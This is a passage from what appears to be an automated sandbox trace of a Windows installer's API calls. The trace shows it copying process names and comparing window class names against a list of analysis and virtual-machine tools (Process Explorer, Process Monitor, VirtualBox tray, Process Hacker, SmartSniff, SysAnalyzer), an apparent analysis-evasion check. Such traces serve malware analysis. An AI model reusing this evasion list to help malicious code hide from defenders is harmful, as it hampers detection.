lpString1="kernel32") returned="kernel32" [0158.434] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.434] lstrcpyA (in: lpString1=0x431400, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0158.434] lstrcpyA (in: lpString1=0x430000, lpString2="11" | out: lpString1="11") returned="11" [0158.434] lstrcpyA (in: lpString1=0x33e508, lpString2="3337488" | out: lpString1="3337488") returned="3337488" [0158.435] lstrcpyA (in: lpString1=0x431800, lpString2="2592" | out: lpString1="2592") returned="2592" [0158.435] lstrcpyA (in: lpString1=0x430800, lpString2="3337992" | out: lpString1="3337992") returned="3337992" [0158.435] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.435] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.435] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.435] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.435] lstrcpyA (in: lpString1=0x431400, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0158.435] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.435] lstrcpyA (in: lpString1=0x33e508, lpString2="3338016" | out: lpString1="3338016") returned="3338016" [0158.435] lstrcpyA (in: lpString1=0x431800, lpString2="2624" | out: lpString1="2624") returned="2624" [0158.435] lstrcpyA (in: lpString1=0x430800, lpString2="3338968" | out: lpString1="3338968") returned="3338968" [0158.435] lstrcpyA (in: lpString1=0x431000, lpString2="976" | out: lpString1="976") returned="976" [0158.435] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.435] lstrcpyA 
(in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.435] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.436] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.436] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.436] lstrcpyA (in: lpString1=0x33e508, lpString2="3338992" | out: lpString1="3338992") returned="3338992" [0158.436] lstrcpyA (in: lpString1=0x431800, lpString2="2948" | out: lpString1="2948") returned="2948" [0158.436] lstrcpyA (in: lpString1=0x430800, lpString2="3339496" | out: lpString1="3339496") returned="3339496" [0158.437] GlobalSize (hMem=0x33e100) returned 0x14a4 [0158.437] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrlenA (lpString="callback1") returned 9 [0158.437] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.437] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.437] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.437] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.437] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.437] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.437] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.437] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.437] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.437] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.437] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.437] lstrcpynA (in: lpString1=0x40a818, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.437] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.438] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.438] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.438] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.438] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.438] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.438] lstrcpynA (in: lpString1=0x341200, lpString2="131390", iMaxLength=1024 | out: lpString1="131390") returned="131390" [0158.438] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.438] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.438] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.438] GetWindowTextA (in: hWnd=0x2013e, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0158.438] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.438] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.438] lstrcpyA (in: lpString1=0x430800, lpString2="Network Flyout" | out: lpString1="Network Flyout") returned="Network Flyout" [0158.438] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131390") returned 6 
[0158.438] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.438] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.438] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.438] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.438] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.438] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.439] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.439] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.439] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", 
iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.439] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.439] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.439] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.439] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.439] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.439] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.439] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.439] lstrcpynA (in: lpString1=0x3401e0, lpString2="131390", iMaxLength=1024 | out: lpString1="131390") returned="131390" [0158.439] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.439] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.439] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.439] GetClassNameA (in: hWnd=0x2013e, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="ATL:000007FEF62152C0") returned 20 [0158.439] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.439] lstrcpynA (in: lpString1=0x341200, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" 
[0158.439] lstrcpyA (in: lpString1=0x430c00, lpString2="ATL:000007FEF62152C0" | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.439] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131390") returned 6 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.440] lstrlenA (lpString="0") returned 1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="PROCEXPL") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="PROCMON_WINDOW_CLASS") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, 
lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="VBoxTrayToolWndClass") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="VMSwitchUserControlClass") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="ProcessLasso_Notification_Class") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA 
(lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="SmartSniff") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="ProcessHacker") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") 
returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.441] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="SysAnalyzer") returned -1 [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.441] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.441] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.441] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.441] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="VMSwitchUserControlClass") returned -1 [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.441] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.441] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.441] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.441] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="ProcessHacker") returned -1 [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" 
[0158.441] lstrlenA (lpString="Network Flyout") returned 14 [0158.441] lstrcpynA (in: lpString1=0x40ac18, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.441] lstrcmpiA (lpString1="Network Flyout", lpString2="0") returned 1 [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrlenA (lpString="Network Flyout") returned 14 [0158.441] lstrcpynA (in: lpString1=0x33723c, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.441] lstrlenA (lpString="3399936") returned 7 [0158.441] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.441] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.441] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.441] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.441] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.441] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x33723c, 
lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.441] lstrcpynA (in: lpString1=0x337684, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.441] lstrlenA (lpString="") returned 0 [0158.441] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.441] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.441] lstrcpynA (in: lpString1=0x337acc, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x432c00, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.441] lstrlenA (lpString="") returned 0 [0158.442] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.442] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.442] lstrlenA (lpString="") returned 0 [0158.442] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.442] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.442] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.442] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.442] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.442] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.442] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.442] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.442] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.442] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.442] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
